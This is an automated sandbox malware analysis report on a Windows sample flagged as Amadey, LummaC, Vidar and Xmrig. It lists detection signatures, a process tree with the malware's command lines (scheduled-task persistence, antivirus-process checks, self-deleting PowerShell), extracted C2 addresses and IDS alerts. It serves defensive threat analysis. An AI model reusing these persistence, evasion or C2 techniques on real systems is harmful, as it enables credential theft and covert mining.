Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1579182
MD5:5c8cb972f2920bd6edc98690f1634958
SHA1:73d87008bda6fd11921bfad989b48c09ce82b20f
SHA256:246affa1629352f335434a02500b288a55592990b1b669a6a5cb112c20f04f8f
Tags:exeuser-Bitsight
Infos:

Detection

LummaC, Amadey, LummaC Stealer, Vidar, Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Vidar stealer
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Drops PE files with a suspicious file extension
Drops password protected ZIP file
Found API chain indicative of sandbox detection
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Found strings related to Crypto-Mining
Hides threads from debuggers
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Leaks process information
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses cmd line tools excessively to alter registry or file data
Uses ping.exe to check the status of other devices and networks
Uses schtasks.exe or at.exe to add and modify task schedules
Writes many files with high entropy
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Enables security privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 1224 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 5C8CB972F2920BD6EDC98690F1634958)
    • skotes.exe (PID: 6628 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 5C8CB972F2920BD6EDC98690F1634958)
  • skotes.exe (PID: 2672 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 5C8CB972F2920BD6EDC98690F1634958)
    • f0aeaa9386.exe (PID: 6640 cmdline: "C:\Users\user\AppData\Local\Temp\1018967001\f0aeaa9386.exe" MD5: 3A425626CBD40345F5B8DDDD6B2B9EFA)
      • cmd.exe (PID: 6308 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • mode.com (PID: 2276 cmdline: mode 65,10 MD5: BEA7464830980BF7C0490307DB4FC875)
        • 7z.exe (PID: 1888 cmdline: 7z.exe e file.zip -p24291711423417250691697322505 -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 2568 cmdline: 7z.exe e extracted/file_7.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 7112 cmdline: 7z.exe e extracted/file_6.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 5416 cmdline: 7z.exe e extracted/file_5.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 7040 cmdline: 7z.exe e extracted/file_4.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 2408 cmdline: 7z.exe e extracted/file_3.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 1308 cmdline: 7z.exe e extracted/file_2.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 2604 cmdline: 7z.exe e extracted/file_1.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • attrib.exe (PID: 5316 cmdline: attrib +H "in.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
        • in.exe (PID: 1960 cmdline: "in.exe" MD5: 83D75087C9BF6E4F07C36E550731CCDE)
          • attrib.exe (PID: 5036 cmdline: attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
            • conhost.exe (PID: 5620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • attrib.exe (PID: 5004 cmdline: attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
            • conhost.exe (PID: 5536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • schtasks.exe (PID: 5512 cmdline: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • conhost.exe (PID: 1264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 1480 cmdline: powershell ping 127.0.0.1; del in.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 6832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • PING.EXE (PID: 4196 cmdline: "C:\Windows\system32\PING.EXE" 127.0.0.1 MD5: 2F46799D79D22AC72C241EC0322B011D)
    • 3dd71a48b2.exe (PID: 6804 cmdline: "C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exe" MD5: 8EB4F92605E35C57A42B0917C221D65C)
      • cmd.exe (PID: 2928 cmdline: "C:\Windows\System32\cmd.exe" /c move App App.cmd & App.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 5344 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • findstr.exe (PID: 6568 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • tasklist.exe (PID: 5756 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • findstr.exe (PID: 3788 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • cmd.exe (PID: 6340 cmdline: cmd /c md 245347 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • findstr.exe (PID: 2624 cmdline: findstr /V "profiles" Organizing MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • cmd.exe (PID: 892 cmdline: cmd /c copy /b ..\Judy + ..\Sheets + ..\Another + ..\Wanting b MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • Dry.com (PID: 4952 cmdline: Dry.com b MD5: 62D09F076E6E0240548C2F837536A46A)
        • choice.exe (PID: 5008 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
    • db77c3e215.exe (PID: 5364 cmdline: "C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exe" MD5: 27C1F96D7E1B72B6817B6EFEFF037F90)
    • 4fa7efe79d.exe (PID: 3032 cmdline: "C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exe" MD5: AFD936E441BF5CBDB858E96833CC6ED3)
      • conhost.exe (PID: 4284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • 4fa7efe79d.exe (PID: 2252 cmdline: "C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exe" MD5: AFD936E441BF5CBDB858E96833CC6ED3)
    • ea2827841c.exe (PID: 6704 cmdline: "C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exe" MD5: 202E966732FE7168248CEB69D8D41B48)
    • 3f5e6ed253.exe (PID: 6716 cmdline: "C:\Users\user\AppData\Local\Temp\1018972001\3f5e6ed253.exe" MD5: 669ED3665495A4A52029FF680EC8EBA9)
  • Intel_PTT_EK_Recertification.exe (PID: 5044 cmdline: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe MD5: 83D75087C9BF6E4F07C36E550731CCDE)
    • explorer.exe (PID: 5284 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
    • powershell.exe (PID: 2888 cmdline: powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 6180 cmdline: "C:\Windows\system32\PING.EXE" 127.1.10.1 MD5: 2F46799D79D22AC72C241EC0322B011D)
  • Intel_PTT_EK_Recertification.exe (PID: 380 cmdline: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe MD5: 83D75087C9BF6E4F07C36E550731CCDE)
    • explorer.exe (PID: 2448 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
    • powershell.exe (PID: 4752 cmdline: powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

Threatname: LummaC

{"C2 url": ["crosshuaht.lat", "grannyejh.lat", "aspecteirs.lat", "energyaffai.lat", "discokeyus.lat", "pancakedipyps.click", "rapeflowwj.lat", "necklacebudi.lat", "sustainskelet.lat"], "Build id": "FATE99--test"}

Threatname: Vidar

{"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
      sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        0000002C.00000003.3133503211.0000000004181000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          0000002C.00000002.3807607263.00000000019D4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            0000002C.00000002.3807607263.0000000001927000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              00000021.00000002.2944554300.0000000001239000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                00000000.00000003.2108909272.0000000004850000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                  Click to see the 34 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  44.2.Dry.com.5d0000.1.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                    0.2.file.exe.50000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                      2.2.skotes.exe.f90000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                        52.3.Intel_PTT_EK_Recertification.exe.1a628d70000.0.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                          52.3.Intel_PTT_EK_Recertification.exe.1a628d70000.0.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
                          • 0x324cc8:$x1: donate.ssl.xmrig.com
                          Click to see the 16 entries

                          Sigma Signatures

                          System Summary

                          barindex
                          Sigma detected: New RUN Key Pointing to Suspicious Folder
                          Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1018977001\7278b2c5ac.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 2672, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\7278b2c5ac.exe
                          Sigma detected: CurrentVersion Autorun Keys Modification
                          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1018977001\7278b2c5ac.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 2672, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\7278b2c5ac.exe
                          Sigma detected: Suspicious Add Scheduled Task Parent
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, CommandLine: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "in.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\main\in.exe, ParentProcessId: 1960, ParentProcessName: in.exe, ProcessCommandLine: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, ProcessId: 5512, ProcessName: schtasks.exe
                          Sigma detected: Suspicious Schtasks From Env Var Folder
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, CommandLine: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "in.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\main\in.exe, ParentProcessId: 1960, ParentProcessName: in.exe, ProcessCommandLine: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, ProcessId: 5512, ProcessName: schtasks.exe
                          Sigma detected: Non Interactive PowerShell Process Spawned
                          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell ping 127.0.0.1; del in.exe, CommandLine: powershell ping 127.0.0.1; del in.exe, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "in.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\main\in.exe, ParentProcessId: 1960, ParentProcessName: in.exe, ProcessCommandLine: powershell ping 127.0.0.1; del in.exe, ProcessId: 1480, ProcessName: powershell.exe

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Sigma detected: Search for Antivirus process
                          Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move App App.cmd & App.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2928, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 3788, ProcessName: findstr.exe

                          Suricata Signatures

                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-21T01:14:37.427391+010020283713Unknown Traffic192.168.2.549890172.67.197.170443TCP
                          2024-12-21T01:14:39.145938+010020283713Unknown Traffic192.168.2.549897172.67.197.170443TCP
                          2024-12-21T01:14:46.006483+010020283713Unknown Traffic192.168.2.549911104.21.23.76443TCP
                          2024-12-21T01:14:47.981783+010020283713Unknown Traffic192.168.2.549917104.21.23.76443TCP
                          2024-12-21T01:14:50.493760+010020283713Unknown Traffic192.168.2.549923104.21.23.76443TCP
                          2024-12-21T01:14:53.178057+010020283713Unknown Traffic192.168.2.549933104.21.23.76443TCP
                          2024-12-21T01:14:55.745500+010020283713Unknown Traffic192.168.2.549942104.21.23.76443TCP
                          2024-12-21T01:14:59.528961+010020283713Unknown Traffic192.168.2.549953104.21.23.76443TCP
                          2024-12-21T01:15:02.034539+010020283713Unknown Traffic192.168.2.549963104.21.23.76443TCP
                          2024-12-21T01:15:08.315228+010020283713Unknown Traffic192.168.2.549992104.21.23.76443TCP
                          2024-12-21T01:15:10.048358+010020283713Unknown Traffic192.168.2.549998172.67.180.113443TCP
                          2024-12-21T01:15:12.242971+010020283713Unknown Traffic192.168.2.550011172.67.180.113443TCP
                          2024-12-21T01:15:51.023303+010020283713Unknown Traffic192.168.2.550151172.67.197.170443TCP
                          2024-12-21T01:15:52.998155+010020283713Unknown Traffic192.168.2.550157172.67.197.170443TCP
                          2024-12-21T01:15:55.681620+010020283713Unknown Traffic192.168.2.550161172.67.197.170443TCP
                          2024-12-21T01:15:57.811329+010020283713Unknown Traffic192.168.2.550163172.67.197.170443TCP
                          2024-12-21T01:16:00.146336+010020283713Unknown Traffic192.168.2.550164172.67.197.170443TCP
                          2024-12-21T01:16:02.394559+010020283713Unknown Traffic192.168.2.550167172.67.197.170443TCP
                          2024-12-21T01:16:05.586035+010020283713Unknown Traffic192.168.2.550169172.67.197.170443TCP
                          2024-12-21T01:16:06.750743+010020283713Unknown Traffic192.168.2.550170172.67.197.170443TCP
                          2024-12-21T01:16:09.072896+010020283713Unknown Traffic192.168.2.550178172.67.197.170443TCP
                          2024-12-21T01:16:09.401577+010020283713Unknown Traffic192.168.2.550180172.67.197.170443TCP
                          2024-12-21T01:16:17.111430+010020283713Unknown Traffic192.168.2.550205172.67.197.170443TCP
                          2024-12-21T01:16:19.193764+010020283713Unknown Traffic192.168.2.550216172.67.197.170443TCP
                          2024-12-21T01:16:21.323075+010020283713Unknown Traffic192.168.2.550217172.67.197.170443TCP
                          2024-12-21T01:16:23.665889+010020283713Unknown Traffic192.168.2.550220172.67.197.170443TCP
                          2024-12-21T01:16:26.541293+010020283713Unknown Traffic192.168.2.550223172.67.197.170443TCP
                          2024-12-21T01:16:31.127252+010020283713Unknown Traffic192.168.2.550225172.67.197.170443TCP
                          2024-12-21T01:16:42.832038+010020283713Unknown Traffic192.168.2.550266172.67.197.170443TCP
                          2024-12-21T01:16:44.891244+010020283713Unknown Traffic192.168.2.550274172.67.197.170443TCP
                          2024-12-21T01:16:47.440474+010020283713Unknown Traffic192.168.2.550278172.67.197.170443TCP
                          2024-12-21T01:16:49.577689+010020283713Unknown Traffic192.168.2.550279172.67.197.170443TCP
                          2024-12-21T01:16:51.751651+010020283713Unknown Traffic192.168.2.550281172.67.197.170443TCP
                          2024-12-21T01:16:54.036718+010020283713Unknown Traffic192.168.2.550286172.67.197.170443TCP
                          2024-12-21T01:16:56.171112+010020283713Unknown Traffic192.168.2.550288172.67.197.170443TCP
                          2024-12-21T01:16:58.373137+010020283713Unknown Traffic192.168.2.550291172.67.197.170443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-21T01:15:21.517409+010020446231A Network Trojan was detected192.168.2.550045185.215.113.4380TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-21T01:14:38.388510+010020546531A Network Trojan was detected192.168.2.549890172.67.197.170443TCP
                          2024-12-21T01:14:46.750584+010020546531A Network Trojan was detected192.168.2.549911104.21.23.76443TCP
                          2024-12-21T01:14:48.777129+010020546531A Network Trojan was detected192.168.2.549917104.21.23.76443TCP
                          2024-12-21T01:15:09.092745+010020546531A Network Trojan was detected192.168.2.549992104.21.23.76443TCP
                          2024-12-21T01:15:11.320447+010020546531A Network Trojan was detected192.168.2.549998172.67.180.113443TCP
                          2024-12-21T01:15:51.764405+010020546531A Network Trojan was detected192.168.2.550151172.67.197.170443TCP
                          2024-12-21T01:15:53.756642+010020546531A Network Trojan was detected192.168.2.550157172.67.197.170443TCP
                          2024-12-21T01:16:07.522227+010020546531A Network Trojan was detected192.168.2.550170172.67.197.170443TCP
                          2024-12-21T01:16:09.866687+010020546531A Network Trojan was detected192.168.2.550178172.67.197.170443TCP
                          2024-12-21T01:16:10.239151+010020546531A Network Trojan was detected192.168.2.550180172.67.197.170443TCP
                          2024-12-21T01:16:31.761725+010020546531A Network Trojan was detected192.168.2.550225172.67.197.170443TCP
                          2024-12-21T01:16:43.656279+010020546531A Network Trojan was detected192.168.2.550266172.67.197.170443TCP
                          2024-12-21T01:16:45.671072+010020546531A Network Trojan was detected192.168.2.550274172.67.197.170443TCP
                          2024-12-21T01:16:59.022303+010020546531A Network Trojan was detected192.168.2.550291172.67.197.170443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-21T01:14:38.388510+010020498361A Network Trojan was detected192.168.2.549890172.67.197.170443TCP
                          2024-12-21T01:14:46.750584+010020498361A Network Trojan was detected192.168.2.549911104.21.23.76443TCP
                          2024-12-21T01:15:11.320447+010020498361A Network Trojan was detected192.168.2.549998172.67.180.113443TCP
                          2024-12-21T01:15:51.764405+010020498361A Network Trojan was detected192.168.2.550151172.67.197.170443TCP
                          2024-12-21T01:16:07.522227+010020498361A Network Trojan was detected192.168.2.550170172.67.197.170443TCP
                          2024-12-21T01:16:43.656279+010020498361A Network Trojan was detected192.168.2.550266172.67.197.170443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-21T01:14:48.777129+010020498121A Network Trojan was detected192.168.2.549917104.21.23.76443TCP
                          2024-12-21T01:15:53.756642+010020498121A Network Trojan was detected192.168.2.550157172.67.197.170443TCP
                          2024-12-21T01:16:09.866687+010020498121A Network Trojan was detected192.168.2.550178172.67.197.170443TCP
                          2024-12-21T01:16:45.671072+010020498121A Network Trojan was detected192.168.2.550274172.67.197.170443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-21T01:14:37.427391+010020583611Domain Observed Used for C2 Detected192.168.2.549890172.67.197.170443TCP
                          2024-12-21T01:14:39.145938+010020583611Domain Observed Used for C2 Detected192.168.2.549897172.67.197.170443TCP
                          2024-12-21T01:15:51.023303+010020583611Domain Observed Used for C2 Detected192.168.2.550151172.67.197.170443TCP
                          2024-12-21T01:15:52.998155+010020583611Domain Observed Used for C2 Detected192.168.2.550157172.67.197.170443TCP
                          2024-12-21T01:15:55.681620+010020583611Domain Observed Used for C2 Detected192.168.2.550161172.67.197.170443TCP
                          2024-12-21T01:15:57.811329+010020583611Domain Observed Used for C2 Detected192.168.2.550163172.67.197.170443TCP
                          2024-12-21T01:16:00.146336+010020583611Domain Observed Used for C2 Detected192.168.2.550164172.67.197.170443TCP
                          2024-12-21T01:16:02.394559+010020583611Domain Observed Used for C2 Detected192.168.2.550167172.67.197.170443TCP
                          2024-12-21T01:16:05.586035+010020583611Domain Observed Used for C2 Detected192.168.2.550169172.67.197.170443TCP
                          2024-12-21T01:16:06.750743+010020583611Domain Observed Used for C2 Detected192.168.2.550170172.67.197.170443TCP
                          2024-12-21T01:16:09.072896+010020583611Domain Observed Used for C2 Detected192.168.2.550178172.67.197.170443TCP
                          2024-12-21T01:16:09.401577+010020583611Domain Observed Used for C2 Detected192.168.2.550180172.67.197.170443TCP
